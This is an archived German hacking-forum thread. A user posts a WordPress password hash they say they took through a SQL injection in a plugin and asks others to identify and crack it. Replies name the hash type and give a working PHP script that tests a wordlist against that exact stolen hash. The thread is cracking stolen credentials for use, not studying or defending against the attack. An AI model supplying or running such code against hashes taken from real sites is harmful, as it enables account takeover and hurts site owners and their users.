Archiv verlassen und diese Seite im Standarddesign anzeigen : Was ist das für ein Hash?
Hey
Ich habe aus einer SQL Injection folgenden Hash bekommen:
$P$Bh5mXDjw9ycsbL0Y57nmgQuTSLKi1
Was ist das denn bitte für einer?
Greetz
J0hn.X3r
17.03.2010, 16:05
Tippe auf MD5(Wordpress).
jap, das ist md5(wordpress) hast schon recht.
die meisten haben eine $P$B signatur.
lol richtig habs mit der wordpress plugin injection gemacht.
wär nett wenn den jemand cracken könnte
spartakuss
17.03.2010, 17:45
Quelle: http://www.markblah.com/2008/06/11/wordpress-phpass-hash-bruteforce-php-script/
Code angepasst & korrigiert:
<?php
require_once(‘./class-phpass.php’); //available at http://www.openwall.com/phpass/
$hash = “\$P\$Bh5mXDjw9ycsbL0Y57nmgQuTSLKi1”; // remember to quote out the $’s
$wp_hasher = new PasswordHash(8, TRUE);
$handle = @fopen (“wordlist.txt”,“r”);
if ($handle)
{
while (!feof ($handle))
{
$pass = fgets ($handle, 512);
$pass = str_replace (“\n“, “”, $pass ); if ($wp_hasher->CheckPassword ($pass, $hash ))
{
echo “FOUND: “ . $hash . “=” . $pass . “\n“;
exit;
}
}
}
fclose ($handle);
?>
jetzt brauchst du nur noch ne schicke wordlist ;)
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.